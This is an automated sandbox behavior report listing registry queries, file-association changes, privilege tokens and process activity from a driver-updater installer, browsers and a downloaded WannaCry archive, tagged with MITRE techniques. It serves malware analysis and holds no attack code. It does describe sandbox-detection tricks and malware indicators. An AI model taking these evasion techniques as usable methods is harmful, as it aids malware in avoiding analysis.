Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0003	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceCharacteristics	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceCharacteristics	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ParentIdPrefix	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ParentIdPrefix	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LocationInformation	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0004	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Driver	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\	PCHelpSoftDriverUpdater.exe

Checks processor information in registry 2 TTPs 24 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exefirefox.exefirefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exePCHelpSoftDriverUpdater.exemsedge.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exe04e16c855515880799c8.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757540314643467"	chrome.exe
Key created	\Registry\User\.DEFAULT\Software\MemeSense	04e16c855515880799c8.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 28 IoCs

Processes:

Driver_Updater_setup.tmpPCHelpSoftDriverUpdater.exemsedge.exefirefox.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\DefaultIcon\ = "C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\PCHelpSoftDriverUpdater.exe,0"	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes	Driver_Updater_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\ = "PC HelpSoft Driver Updater Protected File"	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open	PCHelpSoftDriverUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes\.HDM_encrypted	Driver_Updater_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\ = "URL: Driver Updater Protocol"	PCHelpSoftDriverUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe\SupportedTypes	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell	PCHelpSoftDriverUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PCHelpSoftDriverUpdater.exe	Driver_Updater_setup.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\URL Protocol	PCHelpSoftDriverUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted\OpenWithProgids	Driver_Updater_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.HDM_encrypted\OpenWithProgids\PCHelpSoftDriverUpdater.HDM_encrypted	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.HDM_encrypted\OpenWithProgids	Driver_Updater_setup.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\DefaultIcon	Driver_Updater_setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command\ = "\"C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\Extra\\DriverPro.exe\" \"%1\""	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver	PCHelpSoftDriverUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open\command\ = "\"C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\PCHelpSoftDriverUpdater.exe\" \"%1\""	PCHelpSoftDriverUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell	Driver_Updater_setup.tmp
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open\command	PCHelpSoftDriverUpdater.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

6528 reg.exe

pid	process
6528	reg.exe

NTFS ADS 4 IoCs

Processes:

msedge.exemsedge.exefirefox.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 34330.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 868439.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	firefox.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 345684.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

04e16c855515880799c8.exechrome.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeDriver_Updater_setup.tmpPCHelpSoftDriverUpdater.exeDriverPro.exePCHelpSoftDriverUpdater.exe

pid	process
5304	04e16c855515880799c8.exe
5304	04e16c855515880799c8.exe
5304	04e16c855515880799c8.exe
5304	04e16c855515880799c8.exe
3408	chrome.exe
3408	chrome.exe
3632	msedge.exe
3632	msedge.exe
2076	msedge.exe
2076	msedge.exe
2088	identity_helper.exe
2088	identity_helper.exe
5988	msedge.exe
5988	msedge.exe
6896	msedge.exe
6896	msedge.exe
4436	Driver_Updater_setup.tmp
4436	Driver_Updater_setup.tmp
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
6988	DriverPro.exe
6988	DriverPro.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

04e16c855515880799c8.exePCHelpSoftDriverUpdater.exemsedge.exe

pid process

5304 04e16c855515880799c8.exe
6720 PCHelpSoftDriverUpdater.exe
4564 msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exefirefox.exePCHelpSoftDriverUpdater.exe

description	pid	process
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeShutdownPrivilege	3408	chrome.exe
Token: SeCreatePagefilePrivilege	3408	chrome.exe
Token: SeDebugPrivilege	2660	firefox.exe
Token: SeDebugPrivilege	2660	firefox.exe
Token: SeDebugPrivilege	1036	PCHelpSoftDriverUpdater.exe
Token: SeIncreaseQuotaPrivilege	1036	PCHelpSoftDriverUpdater.exe
Token: SeImpersonatePrivilege	1036	PCHelpSoftDriverUpdater.exe
Token: SeLoadDriverPrivilege	1036	PCHelpSoftDriverUpdater.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exefirefox.exemsedge.exe

pid	process
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2660	firefox.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe
2076	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exefirefox.exePCHelpSoftDriverUpdater.exefirefox.exe

pid	process
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
